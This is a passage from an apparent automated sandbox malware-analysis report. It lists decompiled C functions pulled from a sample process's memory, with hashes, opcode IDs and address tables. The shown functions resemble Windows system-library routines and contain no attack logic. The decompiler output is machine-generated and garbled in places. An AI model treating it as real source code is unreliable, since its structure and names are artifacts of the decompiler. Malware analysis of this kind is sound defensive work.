                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9802a52c5be734150b46dee019044715e57c9964f15bef3638fddc9abaa6a550
                                                                                                                              • Instruction ID: 3759eec76bf47ad5e75ee671f256a8328c64287de8743fa7ca4b357691157538
                                                                                                                              • Opcode Fuzzy Hash: 9802a52c5be734150b46dee019044715e57c9964f15bef3638fddc9abaa6a550
                                                                                                                              • Instruction Fuzzy Hash: C4312432705552AFC3128F68CC65F6B7BA9EF40A50F024151F9459B794DA74FC40C3A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76FBC0 Relevance: .1, Instructions: 114COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 71%
                                                                                                                              			E1D76FBC0(intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				short _v46;
				char _v52;
				void* __esi;
				signed int _t38;
				void* _t39;
				void* _t43;
				intOrPtr* _t46;
				signed char* _t47;
				signed char* _t52;
				void* _t59;
				signed int _t72;
				void* _t73;
				intOrPtr* _t75;
				void* _t76;
				void* _t77;
				signed int _t78;

				_t80 = (_t78 & 0xfffffff8) - 0x34;
				_v8 =  *0x1d83b370 ^ (_t78 & 0xfffffff8) - 0x00000034;
				_t38 = _a12;
				_t75 = _a4;
				if((_t38 & 0xe0000000) != 0 || (_t38 & 0x11000000) == 0x11000000) {
					_t39 = 0xc00000f1;
					L3:
					_pop(_t76);
					return E1D784B50(_t39, _t59, _v8 ^ _t80, _t72, _t73, _t76);
				} else {
					_t72 = _a8;
					if((_t72 & 0xff000000) != 0) {
						_t39 = 0xc00000f0;
						goto L3;
					} else {
						if((_t38 & 0x04000000) == 0) {
							 *((intOrPtr*)(_t75 + 4)) = 0xffffffff;
							 *((intOrPtr*)(_t75 + 8)) = 0;
							 *((intOrPtr*)(_t75 + 0xc)) = 0;
							 *((intOrPtr*)(_t75 + 0x10)) = 0;
							if( *((intOrPtr*)( *[fs:0x30] + 0x64)) <= 1) {
								_t72 = 0;
							} else {
								if((_t38 & 0x02000000) != 0 || _t72 == 0) {
									_t72 = 0x20007d0;
								} else {
									_t72 = _t72 & 0x00ffffff;
								}
							}
							 *(_t75 + 0x14) = _t38 & 0x09000000 | _t72;
							if((_t38 & 0x10000000) != 0 ||  *0x1d834ae0 != 0) {
								_t43 = 1;
							} else {
								_t43 = 0;
							}
							 *_t75 = 0xffffffff;
							if(_t43 != 0) {
								E1D76FCE0(_t75, _t72);
								if( *_t75 == 0xffffffff) {
									 *(_t75 + 0x14) =  *(_t75 + 0x14) | 0x01000000;
								}
							}
							_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
							if(_t46 != 0) {
								if( *_t46 == 0) {
									goto L15;
								} else {
									_t47 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
									goto L16;
								}
								goto L32;
							} else {
								L15:
								_t47 = 0x7ffe0382;
							}
							L16:
							if( *_t47 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000002) != 0) {
									_v16 = _t75;
									_v46 = 0x1723;
									_v20 =  *(_t75 + 0x14);
									if(E1D753C40() == 0) {
										_t52 = 0x7ffe0382;
									} else {
										_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
									}
									_push( &_v52);
									_push(8);
									_push(0x10402);
									_push( *_t52 & 0x000000ff);
									E1D782F90();
								}
							}
						}
						_pop(_t77);
						return E1D784B50(0, _t59, _v8 ^ _t80, _t72, _t73, _t77);
					}
				}
				L32:
			}






















                                                                                                                              0x1d76fbc8
                                                                                                                              0x1d76fbd2
                                                                                                                              0x1d76fbd6
                                                                                                                              0x1d76fbda
                                                                                                                              0x1d76fbe2
                                                                                                                              0x1d76fbf4
                                                                                                                              0x1d76fbf9
                                                                                                                              0x1d76fbf9
                                                                                                                              0x1d76fc08
                                                                                                                              0x1d76fc0b
                                                                                                                              0x1d76fc0b
                                                                                                                              0x1d76fc14
                                                                                                                              0x1d7995b2
                                                                                                                              0x00000000
                                                                                                                              0x1d76fc1a
                                                                                                                              0x1d76fc1f
                                                                                                                              0x1d76fc2c
                                                                                                                              0x1d76fc33
                                                                                                                              0x1d76fc3a
                                                                                                                              0x1d76fc41
                                                                                                                              0x1d76fc4c
                                                                                                                              0x1d7995bc
                                                                                                                              0x1d76fc52
                                                                                                                              0x1d76fc57
                                                                                                                              0x1d76fcbf
                                                                                                                              0x1d76fc5d
                                                                                                                              0x1d76fc5d
                                                                                                                              0x1d76fc5d
                                                                                                                              0x1d76fc57
                                                                                                                              0x1d76fc6d
                                                                                                                              0x1d76fc75
                                                                                                                              0x1d76fcc6
                                                                                                                              0x1d76fc80
                                                                                                                              0x1d76fc80
                                                                                                                              0x1d76fc80
                                                                                                                              0x1d76fc82
                                                                                                                              0x1d76fc8a
                                                                                                                              0x1d76fccc
                                                                                                                              0x1d76fcd4
                                                                                                                              0x1d7995c3
                                                                                                                              0x1d7995c3
                                                                                                                              0x1d76fcd4
                                                                                                                              0x1d76fc92
                                                                                                                              0x1d76fc97
                                                                                                                              0x1d7995d2
                                                                                                                              0x00000000
                                                                                                                              0x1d7995d8
                                                                                                                              0x1d7995e1
                                                                                                                              0x00000000
                                                                                                                              0x1d7995e1
                                                                                                                              0x00000000
                                                                                                                              0x1d76fc9d
                                                                                                                              0x1d76fc9d
                                                                                                                              0x1d76fc9d
                                                                                                                              0x1d76fc9d
                                                                                                                              0x1d76fca2
                                                                                                                              0x1d76fca5
                                                                                                                              0x1d7995f8
                                                                                                                              0x1d799603
                                                                                                                              0x1d799607
                                                                                                                              0x1d79960f
                                                                                                                              0x1d79961a
                                                                                                                              0x1d79962c
                                                                                                                              0x1d79961c
                                                                                                                              0x1d799625
                                                                                                                              0x1d799625
                                                                                                                              0x1d799638
                                                                                                                              0x1d799639
                                                                                                                              0x1d79963b
                                                                                                                              0x1d799640
                                                                                                                              0x1d799641
                                                                                                                              0x1d799641
                                                                                                                              0x1d7995f8
                                                                                                                              0x1d76fca5
                                                                                                                              0x1d76fcb1
                                                                                                                              0x1d76fcbc
                                                                                                                              0x1d76fcbc
                                                                                                                              0x1d76fc14
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9103ce9bcb72ded34482b8c1fed0f7adede82ac41f43982a97b16258501815c
                                                                                                                              • Instruction ID: ad850939ffade23e3daedb01381d31dd667e7e10006ffb9403e001ad1ae898fb
                                                                                                                              • Opcode Fuzzy Hash: f9103ce9bcb72ded34482b8c1fed0f7adede82ac41f43982a97b16258501815c
                                                                                                                              • Instruction Fuzzy Hash: 6241CF32604A818FF715CF28D455726B7E0BB44734F40965BEC5A8B6D0E734E440CB63
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D749AE4 Relevance: .1, Instructions: 112COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E1D749AE4(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t39;
				void* _t41;
				void* _t43;
				signed int _t48;
				signed int _t50;
				void* _t58;
				unsigned int _t70;
				char _t74;
				unsigned int _t76;
				unsigned int _t78;
				signed int _t79;
				void* _t82;

				_t71 = __edx;
				_v8 =  *0x1d83b370 ^ _t79;
				_v536 = 0x200;
				_t74 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t57 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E1D784B50(_t74, _t57, _v8 ^ _t79, _t71, _t74, _t76);
				} else {
					_t39 = E1D74B920( &_v524, __ecx);
					_t76 =  *(_t39 + 0x48) & 0x0000ffff;
					_v528 =  *(_t39 + 0x4a) & 0x0000ffff;
					_t41 = 0xa;
					_t82 = _t76 - _t41;
					if(_t82 > 0 || _t82 == 0) {
						 *_v548 = 0x1d711130;
						L5:
						_t74 = 1;
						goto L6;
					} else {
						_t43 = E1D743E14(__ecx,  &_v532,  &_v536);
						_t71 = _v528;
						if(_t43 == 0) {
							L9:
							E1D74824A(_t76, _t71,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t57 = _v532;
						if(_t57 != 0) {
							_t78 = (_t76 << 0x10) + (_t71 & 0x0000ffff);
							_t48 =  *_t57;
							_v528 = _t48;
							if(_t48 != 0) {
								_t58 = _t57 + 8;
								_t50 = _v528;
								do {
									if( *((intOrPtr*)(_t58 + 0x10)) == 1) {
										if(E1D749A75(_t58,  &_v540) == 0) {
											_t50 = _v528;
										} else {
											_t70 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t50 = _v528;
											if(_t70 >= _t78) {
												_t78 = _t70;
											}
										}
									}
									_t58 = _t58 + 0x20;
									_t50 = _t50 - 1;
									_v528 = _t50;
								} while (_t50 != 0);
								_t57 = _v532;
							}
							if(_t57 !=  &_v524) {
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t74, _t57);
							}
							_t71 = _t78 & 0x0000ffff;
							_t76 = _t78 >> 0x10;
						}
						goto L9;
					}
				}
			}


























                                                                                                                              0x1d749ae4
                                                                                                                              0x1d749af6
                                                                                                                              0x1d749afd
                                                                                                                              0x1d749b08
                                                                                                                              0x1d749b0a
                                                                                                                              0x1d749b10
                                                                                                                              0x1d749b16
                                                                                                                              0x1d749b18
                                                                                                                              0x1d749b24
                                                                                                                              0x1d749b2c
                                                                                                                              0x1d749b5f
                                                                                                                              0x1d749b6f
                                                                                                                              0x1d749b32
                                                                                                                              0x1d749b33
                                                                                                                              0x1d749b38
                                                                                                                              0x1d749b40
                                                                                                                              0x1d749b48
                                                                                                                              0x1d749b49
                                                                                                                              0x1d749b4c
                                                                                                                              0x1d749b56
                                                                                                                              0x1d749b5c
                                                                                                                              0x1d749b5e
                                                                                                                              0x00000000
                                                                                                                              0x1d749b70
                                                                                                                              0x1d749b7f
                                                                                                                              0x1d749b84
                                                                                                                              0x1d749b8c
                                                                                                                              0x1d749b98
                                                                                                                              0x1d749ba1
                                                                                                                              0x1d749bb2
                                                                                                                              0x00000000
                                                                                                                              0x1d749bb2
                                                                                                                              0x1d749b8e
                                                                                                                              0x1d749b96
                                                                                                                              0x1d749bbc
                                                                                                                              0x1d749bbe
                                                                                                                              0x1d749bc0
                                                                                                                              0x1d749bc8
                                                                                                                              0x1d749be3
                                                                                                                              0x1d749be5
                                                                                                                              0x1d749beb
                                                                                                                              0x1d749bef
                                                                                                                              0x1d749c00
                                                                                                                              0x1d749c39
                                                                                                                              0x1d749c02
                                                                                                                              0x1d749c13
                                                                                                                              0x1d749c15
                                                                                                                              0x1d749c1d
                                                                                                                              0x1d749c35
                                                                                                                              0x1d749c35
                                                                                                                              0x1d749c1d
                                                                                                                              0x1d749c00
                                                                                                                              0x1d749c1f
                                                                                                                              0x1d749c22
                                                                                                                              0x1d749c25
                                                                                                                              0x1d749c25
                                                                                                                              0x1d749c2d
                                                                                                                              0x1d749c2d
                                                                                                                              0x1d749bd2
                                                                                                                              0x1d7a2804
                                                                                                                              0x1d7a2804
                                                                                                                              0x1d749bd8
                                                                                                                              0x1d749bdb
                                                                                                                              0x1d749bdb
                                                                                                                              0x00000000
                                                                                                                              0x1d749b96
                                                                                                                              0x1d749b4c

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 993d47f93f013e62c0ba2fa23764566d47db5e4600d199c7ba637914fa650888
                                                                                                                              • Instruction ID: 068a06bafcf0098f6158e6009f4ec9842a3033ee25733a62d082a93aa207568b
                                                                                                                              • Opcode Fuzzy Hash: 993d47f93f013e62c0ba2fa23764566d47db5e4600d199c7ba637914fa650888
                                                                                                                              • Instruction Fuzzy Hash: C0418374A4022CDBDB25CF69D8C8AA9B3F4FB44620F2181EED90997251DB70DE80CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D737BF0 Relevance: .1, Instructions: 107COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 45%
                                                                                                                              			E1D737BF0(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E1D737C85(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1D782A80();
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						_push(0x1d835b40);
						E1D74E740(_t54);
					}
					return _t52 + 2;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E1D782A80();
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							_push(0x1d835b40);
							E1D74E740(_t54);
						}
						return _t52;
					}
					L5:
					_t33 = E1D7888C0(_a8, _t54, _t52);
					if(_t61 == 0) {
						_push(0x1d835b40);
						E1D74E740(_t54);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1D782A80();
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                                              0x1d737c00
                                                                                                                              0x1d737c04
                                                                                                                              0x1d79afe4
                                                                                                                              0x1d79afe7
                                                                                                                              0x1d79afea
                                                                                                                              0x1d737c0a
                                                                                                                              0x1d737c0a
                                                                                                                              0x1d737c0d
                                                                                                                              0x1d737c0d
                                                                                                                              0x1d737c11
                                                                                                                              0x1d737c15
                                                                                                                              0x1d737c19
                                                                                                                              0x1d79b02d
                                                                                                                              0x1d79b033
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79b03b
                                                                                                                              0x1d79b04c
                                                                                                                              0x1d79b050
                                                                                                                              0x1d79b052
                                                                                                                              0x1d79b055
                                                                                                                              0x1d79b066
                                                                                                                              0x1d79b066
                                                                                                                              0x1d79b03d
                                                                                                                              0x1d79b03d
                                                                                                                              0x1d79b042
                                                                                                                              0x1d79b042
                                                                                                                              0x00000000
                                                                                                                              0x1d737c2a
                                                                                                                              0x1d737c2a
                                                                                                                              0x1d737c30
                                                                                                                              0x1d79aff5
                                                                                                                              0x1d79b006
                                                                                                                              0x1d79b00a
                                                                                                                              0x1d79b00c
                                                                                                                              0x1d79b00f
                                                                                                                              0x1d79b021
                                                                                                                              0x1d79b021
                                                                                                                              0x1d79aff7
                                                                                                                              0x1d79aff7
                                                                                                                              0x1d79affc
                                                                                                                              0x1d79affc
                                                                                                                              0x00000000
                                                                                                                              0x1d79b026
                                                                                                                              0x1d737c36
                                                                                                                              0x1d737c3b
                                                                                                                              0x1d737c45
                                                                                                                              0x1d79b073
                                                                                                                              0x1d79b078
                                                                                                                              0x1d737c4b
                                                                                                                              0x1d737c4e
                                                                                                                              0x1d737c52
                                                                                                                              0x1d79b082
                                                                                                                              0x1d79b085
                                                                                                                              0x1d79b096
                                                                                                                              0x1d79b096
                                                                                                                              0x1d737c52
                                                                                                                              0x1d737c58
                                                                                                                              0x1d737c5e
                                                                                                                              0x1d737c6a
                                                                                                                              0x1d737c6c
                                                                                                                              0x1d737c6d
                                                                                                                              0x00000000
                                                                                                                              0x1d737c60
                                                                                                                              0x1d737c62
                                                                                                                              0x1d737c68
                                                                                                                              0x1d737c7f
                                                                                                                              0x1d737c72
                                                                                                                              0x00000000
                                                                                                                              0x1d737c72
                                                                                                                              0x00000000
                                                                                                                              0x1d737c68
                                                                                                                              0x1d737c5e

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cb2f9e546754493cd756aec7e7f357c63ffd53b266c9b781826f47106b92295b
                                                                                                                              • Instruction ID: 458231376f6e9d79b7c285b303a73c003a2a97a05b665cb755c12fabfd7068c8
                                                                                                                              • Opcode Fuzzy Hash: cb2f9e546754493cd756aec7e7f357c63ffd53b266c9b781826f47106b92295b
                                                                                                                              • Instruction Fuzzy Hash: 4931F632505611FBC7365B18E8C5F36B7A5FF00B71F52861AE5590B1A2DB20E900C7D3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7BFBC2 Relevance: .1, Instructions: 107COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E1D7BFBC2(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				char _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x1d83b370 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(E1D761C7D(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E1D7BFDBA() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E1D782E30() >= 0) {
							L1D752330(_t56, 0x1d83698c);
							_t77 = 1;
							_t68 = 1;
							if( *0x1d836984 == 0) {
								asm("cdq");
								 *(_t79 + 0x1178) = _v64;
								 *(_t79 + 0x117c) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1d836984 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E1D73BD70(0x1d721298, 0x1d7211e8, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E1D7829D0();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E1D782A80();
					 *(_t79 + 0x1178) =  *(_t79 + 0x1178) & 0x00000000;
					 *(_t79 + 0x117c) =  *(_t79 + 0x117c) & 0x00000000;
				}
				if(_t77 != 0) {
					E1D7524D0(0x1d83698c);
				}
				_pop(_t78);
				return E1D784B50(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                                              0x1d7bfbd1
                                                                                                                              0x1d7bfbda
                                                                                                                              0x1d7bfbdf
                                                                                                                              0x1d7bfbe5
                                                                                                                              0x1d7bfbe8
                                                                                                                              0x1d7bfbed
                                                                                                                              0x1d7bfbef
                                                                                                                              0x1d7bfbfa
                                                                                                                              0x1d7bfbfd
                                                                                                                              0x1d7bfc06
                                                                                                                              0x1d7bfc12
                                                                                                                              0x1d7bfc1a
                                                                                                                              0x1d7bfc2f
                                                                                                                              0x1d7bfc30
                                                                                                                              0x1d7bfc31
                                                                                                                              0x1d7bfc32
                                                                                                                              0x1d7bfc3a
                                                                                                                              0x1d7bfc42
                                                                                                                              0x1d7bfc4d
                                                                                                                              0x1d7bfc52
                                                                                                                              0x1d7bfc53
                                                                                                                              0x1d7bfc5c
                                                                                                                              0x1d7bfc65
                                                                                                                              0x1d7bfc66
                                                                                                                              0x1d7bfc6f
                                                                                                                              0x1d7bfc75
                                                                                                                              0x1d7bfc79
                                                                                                                              0x1d7bfc7a
                                                                                                                              0x1d7bfc80
                                                                                                                              0x1d7bfc83
                                                                                                                              0x1d7bfc86
                                                                                                                              0x1d7bfc89
                                                                                                                              0x1d7bfc8c
                                                                                                                              0x1d7bfc92
                                                                                                                              0x1d7bfc98
                                                                                                                              0x1d7bfca1
                                                                                                                              0x1d7bfca4
                                                                                                                              0x1d7bfcb7
                                                                                                                              0x1d7bfcba
                                                                                                                              0x1d7bfcbd
                                                                                                                              0x1d7bfcc0
                                                                                                                              0x1d7bfcca
                                                                                                                              0x1d7bfccc
                                                                                                                              0x1d7bfcd3
                                                                                                                              0x1d7bfcd4
                                                                                                                              0x1d7bfcd6
                                                                                                                              0x1d7bfcd9
                                                                                                                              0x1d7bfce0
                                                                                                                              0x1d7bfce0
                                                                                                                              0x1d7bfcca
                                                                                                                              0x1d7bfc5c
                                                                                                                              0x1d7bfc42
                                                                                                                              0x1d7bfc1a
                                                                                                                              0x1d7bfce9
                                                                                                                              0x1d7bfceb
                                                                                                                              0x1d7bfcee
                                                                                                                              0x1d7bfcf3
                                                                                                                              0x1d7bfcfa
                                                                                                                              0x1d7bfcfa
                                                                                                                              0x1d7bfd03
                                                                                                                              0x1d7bfd0a
                                                                                                                              0x1d7bfd0a
                                                                                                                              0x1d7bfd14
                                                                                                                              0x1d7bfd1f

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 686fb9bf0d33c16bd2a0324b72e03ca49e88f1c04ab684c7a12ee1dfbad5a898
                                                                                                                              • Instruction ID: 86d33fd9bed116227b5ab9ddbef1c25eafce8a380029121c3f3f4fbf6e03694a
                                                                                                                              • Opcode Fuzzy Hash: 686fb9bf0d33c16bd2a0324b72e03ca49e88f1c04ab684c7a12ee1dfbad5a898
                                                                                                                              • Instruction Fuzzy Hash: E4416D76D04208ABDB14CFA5D884BFEFBF4FF48724F11442AE915A3251D731A941CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D777E71 Relevance: .1, Instructions: 104COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D777E71(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L23:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E1D7610D0(0, _t61, 0x1d71115c);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E1D7610D0(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L20:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L20;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = E1D755D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L23;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                              0x1d777e7a
                                                                                                                              0x1d777e7e
                                                                                                                              0x1d777e83
                                                                                                                              0x1d777e8c
                                                                                                                              0x1d7b4994
                                                                                                                              0x00000000
                                                                                                                              0x1d7b4994
                                                                                                                              0x1d777e96
                                                                                                                              0x1d7b4983
                                                                                                                              0x1d777ecb
                                                                                                                              0x1d777ed1
                                                                                                                              0x1d777edd
                                                                                                                              0x1d777ee3
                                                                                                                              0x1d777eea
                                                                                                                              0x1d777ef2
                                                                                                                              0x1d777ef7
                                                                                                                              0x1d777efc
                                                                                                                              0x1d777f5b
                                                                                                                              0x1d777f5b
                                                                                                                              0x1d777f08
                                                                                                                              0x1d777f0c
                                                                                                                              0x1d777f11
                                                                                                                              0x1d777f33
                                                                                                                              0x1d777f39
                                                                                                                              0x1d777f3c
                                                                                                                              0x1d777f44
                                                                                                                              0x1d777f4b
                                                                                                                              0x1d777f4e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d777f50
                                                                                                                              0x1d777f55
                                                                                                                              0x1d777f61
                                                                                                                              0x1d777f61
                                                                                                                              0x00000000
